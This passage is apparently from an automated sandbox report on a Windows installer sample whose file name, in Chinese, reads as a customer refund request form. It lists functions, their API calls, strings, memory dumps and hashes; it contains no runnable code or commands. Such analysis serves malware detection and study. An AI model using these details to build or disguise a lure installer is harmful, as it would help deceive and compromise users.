                                                                                                                                      • GetSysColor.USER32(?), ref: 0040431E
                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404348
                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                      • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                      • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                                                                                                      • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                      • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                                                                                                      Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                        • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                      • String ID: 9
                                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                                      • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                                                                                      • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                                                                                                                      • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                                                                                      • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18
                                                                                                                                      Function 00404BEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                                                                                      • GetMessagePos.USER32 ref: 00404C0F
                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                      • String ID: f
                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                      • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                      • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                                                                                                      Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                      • MulDiv.KERNEL32(000C531B,00000064,000C531F), ref: 00402E3C
                                                                                                                                      • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                      Strings
                                                                                                                                      • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                      • Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                                                                                      • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                                                                                                                      • Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                                                                                      • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                                                                                                                      Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                      • Opcode ID: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                      • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                                                                                                                      • Opcode Fuzzy Hash: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                      • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                                                                                                                      Function 004057F1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405834
                                                                                                                                      • GetLastError.KERNEL32 ref: 00405848
                                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                                                                                      • GetLastError.KERNEL32 ref: 00405867
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                      • API String ID: 3449924974-3976562730
                                                                                                                                      • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                      • Instruction ID: 56aaffc7fd545305371b439287a03fd7ccaf004a29b63406c0e33255b185a1b6
                                                                                                                                      • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                      • Instruction Fuzzy Hash: 90011A72D00619EADF00DFA1C944BEFBBB8EF14354F00843AE945B6281D7789618CFA9
                                                                                                                                      Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                      • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3808545654-0
                                                                                                                                      • Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                      • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                                                                                                                      • Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                      • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                                                                                                                      Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                      • Opcode ID: ffa308e51fc2a7dd0918d2a0305ef53ba2975e26ebd74a39f79ceeac246a8f65
                                                                                                                                      • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                                                                                                                      • Opcode Fuzzy Hash: ffa308e51fc2a7dd0918d2a0305ef53ba2975e26ebd74a39f79ceeac246a8f65
                                                                                                                                      • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                                                                                      Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                      • String ID: !
                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                      • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                      • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                                                                                                                      • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                      • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                                                                                                                      Function 00404ADE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                      • wsprintfW.USER32 ref: 00404B88
                                                                                                                                      • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                      • Opcode ID: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                      • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                                                                                                                      • Opcode Fuzzy Hash: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                                                                                      • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                                                                                                                      Function 00402598 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,0040B5D0,000000FF,skoddenes\Uninstall\polypodiaceous\Excretive140,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                      • lstrlenA.KERNEL32(skoddenes\Uninstall\polypodiaceous\Excretive140,?,?,0040B5D0,000000FF,skoddenes\Uninstall\polypodiaceous\Excretive140,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                                                                      • String ID: skoddenes\Uninstall\polypodiaceous\Excretive140
                                                                                                                                      • API String ID: 3109718747-261738171
                                                                                                                                      • Opcode ID: df88c7b315d98be26a832866f643f7765180fbf59289eea360610b16d9ed4daa
